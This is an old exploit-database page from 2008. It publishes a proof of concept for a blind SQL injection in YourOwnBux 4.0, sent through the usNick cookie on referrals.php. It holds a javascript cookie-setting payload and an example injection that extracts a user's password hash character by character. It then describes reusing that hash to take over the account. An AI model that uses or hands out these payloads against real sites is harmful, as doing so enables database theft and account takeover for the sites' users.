[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : YourOwnBux 4.0 (COOKIE) Remote SQL Injection Vulnerability
# Published : 2008-10-07
# Author : Tec-n0x
# Previous Title : Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability
# Next Title : PHP Realtor 1.5 (view_cat.php v_cat) Remote SQL Injection Vulnerability
________ ._.
______ _______ ____ ______ ______ ____ ____ | |
| | _ __ / _ \____ / ___// __ _/ ___ | |
| ` | ( <_> ) |_> >___ \ ___/ ___ |
/_______ /__| ____/| __/____ >___ >___ > __
/ |__| / / / /
.____ ___.
| | _____ _ |__ ______
| | __ | __ / ___/
| |___ / __ | _ \___
|_______ (____ /___ /____ >
/ / / /
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )
-----[]===========[]=> Discovered By: Tec-n0x
Contact: Tec-n0x <at> hotmail <dot> com
-----[]===========[]=> DropSec.com =~ Lab's ..!!
-----[]===========[]=> Gr33tz:
Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
POC:
Go to => http://site.com/referrals.php ( Logged in )
javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";
=> Modify : ' AND 1=0 /* With Injection's.
=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ]
and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).
---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
# www.Syue.com [2008-10-07]